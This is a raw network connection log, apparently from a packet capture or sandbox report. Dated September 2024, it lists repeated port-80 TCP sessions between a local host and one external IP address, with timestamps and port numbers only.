                    Sep 27, 2024 05:53:13.335771084 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.366638899 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:13.366727114 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.366993904 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.368673086 CEST8049743185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:13.368735075 CEST4974380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:13.375633955 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.112597942 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.112660885 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.113521099 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.130439997 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.357228041 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.357491016 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.460541010 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.460963011 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.465831041 CEST8049744185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.466115952 CEST4974480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.466202974 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:14.466289997 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.466485023 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:14.471724987 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.188616037 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.188724041 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.205626011 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.211448908 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.433603048 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.433656931 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.538758039 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.539194107 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.544081926 CEST8049745185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.544145107 CEST4974580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.544456005 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:15.544526100 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.544646978 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:15.549803019 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.244219065 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.244353056 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.245404005 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.250916004 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.523679972 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.523926020 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.631968975 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.632359028 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.637111902 CEST8049746185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.637166977 CEST4974680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.637506962 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:16.637640953 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.637823105 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:16.642966986 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.395401955 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.395572901 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.396356106 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.401295900 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.631607056 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.631715059 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.771862984 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.772321939 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.778337955 CEST8049747185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.778409958 CEST4974780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.778750896 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:17.778830051 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.779239893 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:17.784590960 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.575508118 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.575774908 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.583463907 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.588711023 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.834453106 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.834544897 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.944669962 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.945075035 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.959340096 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.959435940 CEST8049748185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:18.959475040 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.959507942 CEST4974880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.959789038 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:18.967211008 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:19.705971003 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:19.706068039 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:19.706948042 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:19.711677074 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:19.941138983 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:19.941185951 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.054059029 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.054533958 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.059345961 CEST8049749185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:20.059412956 CEST4974980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.059597969 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:20.059674978 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.059847116 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.065053940 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:20.844162941 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:20.845868111 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.858191013 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:20.864012003 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.099672079 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.100300074 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.212625027 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.212999105 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.217895031 CEST8049750185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.217966080 CEST4975080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.218439102 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.218576908 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.218667984 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.223716021 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.977622986 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:21.977716923 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.979022980 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:21.983865023 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:22.209462881 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:22.209575891 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.319647074 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.320008039 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.325090885 CEST8049751185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:22.325220108 CEST4975180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.325352907 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:22.325431108 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.330441952 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:22.335232019 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.089411020 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.089492083 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.090346098 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.096070051 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.333048105 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.333111048 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.481014967 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.481317043 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.520499945 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.520613909 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.521847963 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.522923946 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.522993088 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.753228903 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.753462076 CEST4975280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:23.758574009 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:23.769083023 CEST8049752185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.494335890 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.494704008 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.495405912 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.513854980 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.753993988 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.754244089 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.866878986 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.867225885 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.872391939 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.872594118 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.872675896 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.874680996 CEST8049753185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:24.874762058 CEST4975380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:24.877619982 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.563750982 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.563920021 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.564929962 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.569742918 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.786482096 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.786551952 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.898714066 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.899425030 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.903887033 CEST8049754185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.903944969 CEST4975480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.904247046 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:25.904325008 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.905311108 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:25.910108089 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.603712082 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.603813887 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.605684042 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.610502005 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.829114914 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.829225063 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.944689035 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.945079088 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.949960947 CEST8049755185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.950021029 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:26.950047970 CEST4975580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.950125933 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.950301886 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:26.955044985 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:27.685352087 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:27.685467958 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:27.686184883 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:27.691400051 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:27.967570066 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:27.967689991 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.069740057 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.070117950 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.074742079 CEST8049756185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:28.074820042 CEST4975680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.074887991 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:28.074974060 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.075129986 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.079871893 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:28.784866095 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:28.784992933 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.785811901 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:28.790565968 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.012288094 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.012412071 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.129112959 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.129348993 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.134145021 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.134255886 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.134381056 CEST8049757185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.134426117 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.134445906 CEST4975780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.139185905 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.860305071 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:29.860577106 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.862093925 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:29.868194103 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.104621887 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.104865074 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.212431908 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.212796926 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.217624903 CEST8049758185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.217694044 CEST4975880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.218003988 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.218092918 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.218231916 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.223206043 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.918351889 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:30.918551922 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.919238091 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:30.924000978 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.143484116 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.143647909 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.257227898 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.257668972 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.263578892 CEST8049759185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.263839006 CEST4975980192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.263896942 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.263993979 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.264282942 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:31.269318104 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.983756065 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:31.983880043 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.005872011 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.010847092 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:32.301059961 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:32.301150084 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.420439005 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.420875072 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.425704002 CEST8049760185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:32.425800085 CEST4976080192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.426026106 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:32.426105022 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.426239967 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:32.431401014 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.119906902 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.120007038 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.120877981 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.125719070 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.343898058 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.344054937 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.460484982 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.460881948 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.466991901 CEST8049761185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.467053890 CEST4976180192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.468075991 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:33.468153000 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.468365908 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:33.474390984 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.187731981 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.187880039 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.188659906 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.194336891 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.419847012 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.420073986 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.523216009 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.523633003 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.529058933 CEST8049762185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.529150963 CEST4976280192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.529359102 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:34.529442072 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.529567957 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:34.535499096 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.231143951 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.231250048 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.231950045 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.236815929 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.455610991 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.455697060 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.570228100 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.570713997 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.575476885 CEST8049763185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.575598955 CEST4976380192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.575681925 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:35.575823069 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.576035023 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:35.581202984 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.282371044 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.282440901 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.283191919 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.288019896 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.507232904 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.507344961 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.616457939 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.616827011 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.621685982 CEST8049764185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.621787071 CEST4976480192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.622256041 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:36.622351885 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.622483015 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:36.627317905 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.391284943 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.391405106 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.392347097 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.402715921 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.619554996 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.619680882 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.801975012 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.802367926 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.807240963 CEST8049765185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.807329893 CEST4976580192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.807610035 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:37.807678938 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.834933996 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:37.839771986 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.497754097 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.497875929 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.499655008 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.504544973 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.722179890 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.722246885 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.839672089 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.840540886 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.845031977 CEST8049766185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.845129013 CEST4976680192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.846961975 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:38.847053051 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.847228050 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:38.853019953 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.568128109 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.568460941 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.569406986 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.575654984 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.797302008 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.797516108 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.916196108 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.916851997 CEST4976880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.921350956 CEST8049767185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.921425104 CEST4976780192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.921924114 CEST8049768185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:39.922064066 CEST4976880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.922194004 CEST4976880192.168.2.4185.215.113.16
                    Sep 27, 2024 05:53:39.926901102 CEST8049768185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:40.644069910 CEST8049768185.215.113.16192.168.2.4
                    Sep 27, 2024 05:53:40.644232988 CEST4976880192.168.2.4185.215.113.16
